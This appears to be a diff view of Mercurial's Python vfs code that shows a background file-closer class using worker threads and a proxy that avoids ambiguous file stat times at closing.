531 object.__setattr__(self, r'_closer', closer)
532 object.__setattr__(self, r'_closer', closer)
532
533
533 def __exit__(self, exc_type, exc_value, exc_tb):
534 def __exit__(self, exc_type, exc_value, exc_tb):
534 self._closer.close(self._origfh)
535 self._closer.close(self._origfh)
535
536
536 def close(self):
537 def close(self):
537 self._closer.close(self._origfh)
538 self._closer.close(self._origfh)
538
539
539 class backgroundfilecloser(object):
540 class backgroundfilecloser(object):
540 """Coordinates background closing of file handles on multiple threads."""
541 """Coordinates background closing of file handles on multiple threads."""
541 def __init__(self, ui, expectedcount=-1):
542 def __init__(self, ui, expectedcount=-1):
542 self._running = False
543 self._running = False
543 self._entered = False
544 self._entered = False
544 self._threads = []
545 self._threads = []
545 self._threadexception = None
546 self._threadexception = None
546
547
547 # Only Windows/NTFS has slow file closing. So only enable by default
548 # Only Windows/NTFS has slow file closing. So only enable by default
548 # on that platform. But allow to be enabled elsewhere for testing.
549 # on that platform. But allow to be enabled elsewhere for testing.
549 defaultenabled = pycompat.iswindows
550 defaultenabled = pycompat.iswindows
550 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
551 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
551
552
552 if not enabled:
553 if not enabled:
553 return
554 return
554
555
555 # There is overhead to starting and stopping the background threads.
556 # There is overhead to starting and stopping the background threads.
556 # Don't do background processing unless the file count is large enough
557 # Don't do background processing unless the file count is large enough
557 # to justify it.
558 # to justify it.
558 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
559 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
559 # FUTURE dynamically start background threads after minfilecount closes.
560 # FUTURE dynamically start background threads after minfilecount closes.
560 # (We don't currently have any callers that don't know their file count)
561 # (We don't currently have any callers that don't know their file count)
561 if expectedcount > 0 and expectedcount < minfilecount:
562 if expectedcount > 0 and expectedcount < minfilecount:
562 return
563 return
563
564
564 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
565 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
565 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
566 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
566
567
567 ui.debug('starting %d threads for background file closing\n' %
568 ui.debug('starting %d threads for background file closing\n' %
568 threadcount)
569 threadcount)
569
570
570 self._queue = pycompat.queue.Queue(maxsize=maxqueue)
571 self._queue = pycompat.queue.Queue(maxsize=maxqueue)
571 self._running = True
572 self._running = True
572
573
573 for i in range(threadcount):
574 for i in range(threadcount):
574 t = threading.Thread(target=self._worker, name='backgroundcloser')
575 t = threading.Thread(target=self._worker, name='backgroundcloser')
575 self._threads.append(t)
576 self._threads.append(t)
576 t.start()
577 t.start()
577
578
578 def __enter__(self):
579 def __enter__(self):
579 self._entered = True
580 self._entered = True
580 return self
581 return self
581
582
582 def __exit__(self, exc_type, exc_value, exc_tb):
583 def __exit__(self, exc_type, exc_value, exc_tb):
583 self._running = False
584 self._running = False
584
585
585 # Wait for threads to finish closing so open files don't linger for
586 # Wait for threads to finish closing so open files don't linger for
586 # longer than lifetime of context manager.
587 # longer than lifetime of context manager.
587 for t in self._threads:
588 for t in self._threads:
588 t.join()
589 t.join()
589
590
590 def _worker(self):
591 def _worker(self):
591 """Main routine for worker thread."""
592 """Main routine for worker thread."""
592 while True:
593 while True:
593 try:
594 try:
594 fh = self._queue.get(block=True, timeout=0.100)
595 fh = self._queue.get(block=True, timeout=0.100)
595 # Need to catch or the thread will terminate and
596 # Need to catch or the thread will terminate and
596 # we could orphan file descriptors.
597 # we could orphan file descriptors.
597 try:
598 try:
598 fh.close()
599 fh.close()
599 except Exception as e:
600 except Exception as e:
600 # Stash so can re-raise from main thread later.
601 # Stash so can re-raise from main thread later.
601 self._threadexception = e
602 self._threadexception = e
602 except pycompat.queue.Empty:
603 except pycompat.queue.Empty:
603 if not self._running:
604 if not self._running:
604 break
605 break
605
606
606 def close(self, fh):
607 def close(self, fh):
607 """Schedule a file for closing."""
608 """Schedule a file for closing."""
608 if not self._entered:
609 if not self._entered:
609 raise error.Abort(_('can only call close() when context manager '
610 raise error.Abort(_('can only call close() when context manager '
610 'active'))
611 'active'))
611
612
612 # If a background thread encountered an exception, raise now so we fail
613 # If a background thread encountered an exception, raise now so we fail
613 # fast. Otherwise we may potentially go on for minutes until the error
614 # fast. Otherwise we may potentially go on for minutes until the error
614 # is acted on.
615 # is acted on.
615 if self._threadexception:
616 if self._threadexception:
616 e = self._threadexception
617 e = self._threadexception
617 self._threadexception = None
618 self._threadexception = None
618 raise e
619 raise e
619
620
620 # If we're not actively running, close synchronously.
621 # If we're not actively running, close synchronously.
621 if not self._running:
622 if not self._running:
622 fh.close()
623 fh.close()
623 return
624 return
624
625
625 self._queue.put(fh, block=True, timeout=None)
626 self._queue.put(fh, block=True, timeout=None)
626
627
627 class checkambigatclosing(closewrapbase):
628 class checkambigatclosing(closewrapbase):
628 """Proxy for a file object, to avoid ambiguity of file stat
629 """Proxy for a file object, to avoid ambiguity of file stat
629
630
630 See also util.filestat for detail about "ambiguity of file stat".
631 See also util.filestat for detail about "ambiguity of file stat".
631
632
632 This proxy is useful only if the target file is guarded by any
633 This proxy is useful only if the target file is guarded by any
633 lock (e.g. repo.lock or repo.wlock)
634 lock (e.g. repo.lock or repo.wlock)
634
635
635 Do not instantiate outside of the vfs layer.
636 Do not instantiate outside of the vfs layer.
636 """
637 """
637 def __init__(self, fh):
638 def __init__(self, fh):
638 super(checkambigatclosing, self).__init__(fh)
639 super(checkambigatclosing, self).__init__(fh)
639 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
640 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
640
641
641 def _checkambig(self):
642 def _checkambig(self):
642 oldstat = self._oldstat
643 oldstat = self._oldstat
643 if oldstat.stat:
644 if oldstat.stat:
644 _avoidambig(self._origfh.name, oldstat)
645 _avoidambig(self._origfh.name, oldstat)
645
646
646 def __exit__(self, exc_type, exc_value, exc_tb):
647 def __exit__(self, exc_type, exc_value, exc_tb):
647 self._origfh.__exit__(exc_type, exc_value, exc_tb)
648 self._origfh.__exit__(exc_type, exc_value, exc_tb)
648 self._checkambig()
649 self._checkambig()
649
650
650 def close(self):
651 def close(self):
651 self._origfh.close()
652 self._origfh.close()
652 self._checkambig()
653 self._checkambig()
General Comments 0
You need to be logged in to leave comments. Login now